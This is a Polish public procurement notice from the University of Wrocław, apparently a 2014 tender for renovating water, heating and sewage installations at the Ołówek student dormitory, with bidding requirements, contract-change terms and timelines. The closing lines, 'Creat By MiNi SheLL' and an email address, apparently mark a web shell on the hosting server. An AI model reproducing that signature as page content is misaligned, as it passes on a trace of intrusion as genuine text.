4)Pełnomocnictwo dla osoby/osób podpisującej/cych ofertę do podejmowania zobowiązań w imieniu wykonawcy składającego ofertę, gdy prawo do podpisania oferty nie wynika z innych dokumentów do niej załączonych (w formie oryginału lub kopii poświadczonej za zgodność przez notariusza) 
5)W przypadku złożenia oferty wspólnej przez kilku Wykonawców, należy przedstawić pełnomocnictwo, w formie oryginału albo kopii poświadczonej za zgodność z oryginałem przez notariusza, ustanawiające pełnomocnika do reprezentowania Wykonawców w postępowaniu o udzielenie niniejszego zamówienia albo reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Treść pełnomocnictwa powinna wskazywać rodzaj uprawnień, do których upoważniony jest Pełnomocnik;
6)Jeżeli Wykonawca polegać będzie na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (w formie oryginału albo kopii poświadczonej za zgodność z oryginałem przez notariusza). 
7)W przypadku złożenia wspólnej oferty przez kilka podmiotów, każdy z nich zobowiązany jest przedstawić dokumenty i oświadczenia wystawione na niego w celu wykazania braku podstaw do wykluczenia z postępowania. Pozostałe dokumenty i oświadczenia podmioty składają wspólnie, tj. warunki w nich określone są spełnione, gdy podmioty składające wspólna ofertę spełniają je łącznie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Ze względów losowych dopuszcza się zmianę przedstawicieli Wykonawcy, posiadających 
     wskazane w Umowie kwalifikacje.
2.  W przypadku wystąpienia w trakcie realizacji przedmiotu Umowy: istotnych i 
     nieistotnych  zmian w dokumentacji projektowej (zgłoszonych przez Wykonawcę, 
     potwierdzonych przez Projektanta i zatwierdzonych przez Zamawiającego), których 
    zaistnienie zostało spowodowane sytuacją niemożliwą do przewidzenia na etapie 
    sporządzania dokumentacji projektowej przez Projektanta, a jednocześnie potrzeba ich 
    wykonania powoduje wstrzymanie realizacji przez Wykonawcę zamówienia 
    podstawowego lub wykonanie robót nieprzewidzianych w dokumentacji projektowej - co 
    pociąga za sobą przesunięcie terminu zakończenia realizacji zamówienia podstawowego 
    oraz ze względu na kwaterowanie studentów w obiekcie, dopuszcza się wydłużenie 
    terminu zakończenia realizacji przedmiotu zamówienia do: 2 tygodni dla każdego 
    etapu.
3.  Ze względów organizacyjnych leżących po stronie Wykonawcy dopuszcza się całkowitą      
     rezygnację ze zgłoszonych Podwykonawców oraz zmianę zgłoszonych przez 
     Wykonawcę Podwykonawców w trakcie realizacji Umowy, wymienionych w § 4 
     Umowy*.
      4.  Zmiana stawki podatku VAT od towarów i usług w trakcie realizacji Umowy pociąga za sobą zmianę wynagrodzenia brutto określonego w § 3 ust. 1 bez konieczności zmiany niniejszej umowy.
5.  W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie Umowy 
     nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawarcia 
     Umowy, Zamawiający może odstąpić od Umowy w terminie 30 dni od powzięcia 
     wiadomości o tych okolicznościach. W przypadku, o którym mowa powyżej 
     Wykonawca może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania 
     części umowy ( art. 145 ustawy Prawo zamówień publicznych ).
6. Zamawiający dopuszcza możliwość rezygnacji wykonania pewnego zakresu robót przewidzianych w dokumentacji  projektowej -  w sytuacji,  gdy ich wykonanie będzie zbędne dla prawidłowego tj. zgodnego z zasadami wiedzy technicznej i  obowiązującym na dzień odbioru robót przepisami prawa wykonania przedmiotu umowy, określonego w § 1 ust. 1 Umowy.
7. Zamawiający dopuszcza  zmianę wartości przedmiotu umowy określonej w § 3 ust. 1 Umowy w przypadku: 
     a) konieczności wykonania robót budowlanych niewykraczających swym zakresem poza przedmiot zamówienia, określony w § 1 ust. 1 Umowy,  których ilość jednostek przedmiarowych wskazanych przez Zamawiającego w przedmiarze robót( na podstawie którego Wykonawca sporządził kosztorys ofertowy i dokonał wyceny robót )  została zaniżona,                              
      b) potrzeby wykonania robót budowlanych niewykraczających swym zakresem poza przedmiot zamówienia określony w § 1 ust. 1 Umowy, które zostały pominięte w przedmiarze robót ( na podstawie którego Wykonawca sporządził kosztorys ofertowy i dokonał wyceny robót ), a których wykonanie jest konieczne do zrealizowania i oddania do użytkowania przedmiotu zamówienia określonego w §1 ust. 1 Umowy,
      c) wystąpienia w trakcie realizacji przedmiotu  umowy konieczność wykonania robót zamiennych w stosunku do przewidzianych w dokumentacji projektowej robót podstawowych - w sytuacji gdy wykonanie tych robót będzie niezbędne dla prawidłowego tj. zgodnego z zasadami wiedzy technicznej i obowiązującym na dzień odbioru robót przepisami prawa wykonania przedmiotu umowy, określonego w § 1 ust.1 Umowy,
      d) rezygnacji wykonania pewnego zakresu robót przewidzianych w dokumentacji  projektowej - w sytuacji, gdy ich wykonanie będzie zbędne dla prawidłowego tj. zgodnego z zasadami wiedzy technicznej  i  obowiązującym na dzień odbioru robót przepisami prawa  wykonania przedmiotu umowy, określonego w § 1 ust.1 Umowy,
      e) zawyżonej ilości jednostek przedmiotowych wskazanych przez Zamawiającego w przedmiarze robót (na podstawie którego Wykonawca sporządził kosztorys ofertowy i dokonał wyceny robót) - w odniesieniu do rzeczywistej ilości jednostek robót wykonanych przez Wykonawcę.
8.   Wszelkie zmiany Umowy wymagają formy pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uni.wroc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet Wrocławski, Biuro Zamówień Publicznych
ul. Kuźnicza 49/55
50-138 Wrocław.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.05.2014 godzina 10:00, miejsce: Biuro Zamówień Publicznych
ul. Kuźnicza 49/55, pok. 100
50-138 Wrocław.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Termin wykonania zamówienia: 
Zadanie 1:
- od 10.07.2014 r do 21.08.2014 r
I Etap: od 10.07.2014 r. do 31.07.2014 r;
II Etap: od 21.07.2014 r do 11.08.2014 r;
III Etap: od 12.08.2014 r do 21.08.2014 r;
Zadanie 2:
- od 10.07.2014 r. do 31.01.2015 r.
I Etap: 10.07.2014 r do 10.09.2014 r.;
II Etap: 10.07.2014 r do 10.10.2014 r.;
III Etap: 10.10.2014 r. do 10.12.2014 r.;
IV Etap: 10.12.2014 r. do 31.01.2015 r.
2.Zamawiający nie przewiduje zawarcia umowy ramowej.
3.Zamawiający nie przewiduje zastosowania dynamicznego systemu zakupów
4.Zamawiający nie przewiduje wymagań, o których mowa w art. 29 ust. 4 ustawy Pzp.
5.Zamawiający nie przeprowadzał dialogu technicznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie 1: Remont instalacji wodociągowej oraz centralnego ogrzewania w pomieszczeniach węzła cieplnego dla domu studenckiego Ołówek przy pl. Grunwaldzkim 30 we Wrocławiu oraz remont instalacji wodociągowej w pomieszczeniach przyziemia (łącznik)..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres wykonywania prac budowlanych dla Zadania 1 obejmuje trzy etapy:
I etap: 
- remont instalacji wodociągowej oraz centralnego ogrzewania w pomieszczeniu węzła cieplnego dla II strefy zasilającej dom studencki OŁÓWEK.
II etap: 
- remont instalacji wodociągowej oraz centralnego ogrzewania w pomieszczeniu węzła cieplnego dla I strefy zasilającej dom studencki OŁÓWEK.
III etap: 
- remont instalacji wodociągowej w pomieszczeniach przyziemia ( łącznika ). 

Zakres robót dla Zadania 1 obejmuje wykonanie następujących prac:
a) zabezpieczenie pomieszczeń podczas wykonywania prac ( zabezpieczenie wyposażenia budynku przed zabrudzeniem i zniszczeniem podczas wykonywania prac wraz z udostępnieniem miejsca dla frontu robót),
b) demontaż istniejącej instalacji ,
c) usunięcie gruzu i materiału wymontowanego,
d) montaż nowej instalacji (wymienić całą instalację poziomą wody zimnej, ciepłej, cyrkulacyjnej i centralnego ogrzewania, montaż wodomierzy)
e) montaż 2 wodomierzy na 12 piętrze w D.S. Ołówek.
f) uruchomienie instalacji,
g) próby i testy instalacji,
h) wywóz materiałów z demontażu,
i) wykonanie napraw poinstalacyjnych ścian, stropów, sufitów podwieszanych i posadzek oraz innych zniszczonych podczas prowadzonych prac elementów:
 - po wykonaniu instalacji, należy naprawić wszystkie uszkodzenia elementów budynku 
powstałe w czasie prac, w tym obudowanie pionów płytami g-k oraz ułożenie płytek ceramicznych w miejscach po pracach instalacyjnych, 
 - ubytki ścian i stropów należy wypełnić zaprawą dopuszczoną do stosowania w 
       budownictwie a warstwy wierzchnie wykonać z zachowaniem powierzchni i gładkości nie gorszych od istniejących, 
- ubytki posadzek wypełnić zaprawą dopuszczoną do stosowania w budownictwie a warstwy wierzchnie uzupełnić z zachowaniem technologii wykonania istniejących posadzek, 
- po wykonaniu napraw tynkarskich należy dwukrotnie malować barwą istniejącą miejsca napraw łącznie z najmniejszymi możliwymi do wydzielenia całkowitymi płaszczyznami, 
- przebicia w przegrodach pożarowych wypełnić materiałem o odpowiedniej odporności ogniowej, 
j) inne prace zapewniające kompletność wykonania przedmiotu umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.33.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 21.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie 2: Remont instalacji kanalizacji sanitarnej dla domu studenckiego Ołówek przy pl. Grunwaldzkim 30 we Wrocławiu wraz z pomieszczeniami przyziemia łącznik.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres wykonywania prac budowlanych dla Zadania 2 obejmuje cztery etapy:
I etap:
- remont instalacji kanalizacji sanitarnej (segment 4, 2 piony kanalizacyjne łącznie z przyłączami kanalizacyjnym do studni S2 oraz studni S10) dla domu studenckiego OŁÓWEK przy pl. Grunwaldzkim 30 wraz z pomieszczeniami przyziemia oraz przyłącza kanalizacyjnego SVII. Remont przyłącza kanalizacyjnego SVII należy wykonać w terminie 12 - 21.08.2014 r. Prace budowlane należy wykonać wg rysunków nr 1 i nr 2 (załącznik nr 13 do SIWZ
II etap: 
- remont instalacji kanalizacji sanitarnej (segment 4, pozostałe 2 piony kanalizacyjne) dla domu studenckiego OŁÓWEK przy pl. Grunwaldzkim 30.
III etap: 
- remont instalacji kanalizacji sanitarnej (segment 3) dla domu studenckiego OŁÓWEK przy pl. Grunwaldzkim 30.
IV etap: 
- remont instalacji kanalizacji sanitarnej (segment 1,2) dla domu studenckiego OŁÓWEK przy pl. Grunwaldzkim 30.

Zakres robót dla Zadania 2 obejmuje wykonanie następujących prac:
a)	zabezpieczenie pomieszczeń podczas wykonywania prac (zabezpieczenie wyposażenia budynku przed zabrudzeniem i zniszczeniem podczas wykonywania prac wraz z udostępnieniem miejsca dla frontu robót),
b)	 zabezpieczenie pomieszczeń przed dostępem osób trzecich,
c)  wymiana istniejącej instalacji kanalizacyjnej,
d)  usunięcie gruzu i materiału wymontowanego,
e) montaż armatury sanitarnej,
f) przygotowanie ścian pod wykonanie okładzin ceramicznych,
g) wykonanie izolacji przeciwwilgociowej,
h) malowanie
i)  wymiana posadzki w sanitariatach,
j)  odtworzenie ścian szachtów instalacyjnych i okładzin ściennych,
k) próby i testy instalacji,
l) wykonanie robót ziemnych i montażowych związanych z wymianą na nowe odcinków przyłączy kanalizacyjnych,
m) wywóz materiałów z demontażu,
n) wykonanie napraw poinstalacyjnych ścian, stropów, sufitów podwieszanych i posadzek  oraz innych zniszczonych podczas prowadzonych prac elementów:
 - po wykonaniu instalacji, należy naprawić wszystkie uszkodzenia elementów budynku 
powstałe w czasie prac, w tym obudowanie pionów płytami g-k, 
 - ubytki ścian i stropów należy wypełnić zaprawą dopuszczoną do stosowania w 
budownictwie a warstwy wierzchnie wykonać z zachowaniem powierzchni i gładkości nie gorszych od istniejących, 
- ubytki posadzek wypełnić zaprawą dopuszczoną do stosowania w budownictwie a warstwy wierzchnie uzupełnić z zachowaniem technologii wykonania istniejących posadzek, 
- po wykonaniu napraw tynkarskich należy dwukrotnie malować barwą istniejącą miejsca napraw łącznie z najmniejszymi możliwymi do wydzielenia całkowitymi płaszczyznami, kolory ścian i stropów dopasować do istniejących
 - przebicia w przegrodach pożarowych wypełnić materiałem o odpowiedniej odporności ogniowej, 
o) natychmiastowe usunięcie w sposób docelowy wszelkich szkód i awarii spowodowanych przez Wykonawcę w trakcie realizacji robót,
p) inne prace zapewniające kompletność wykonania przedmiotu umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.33.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com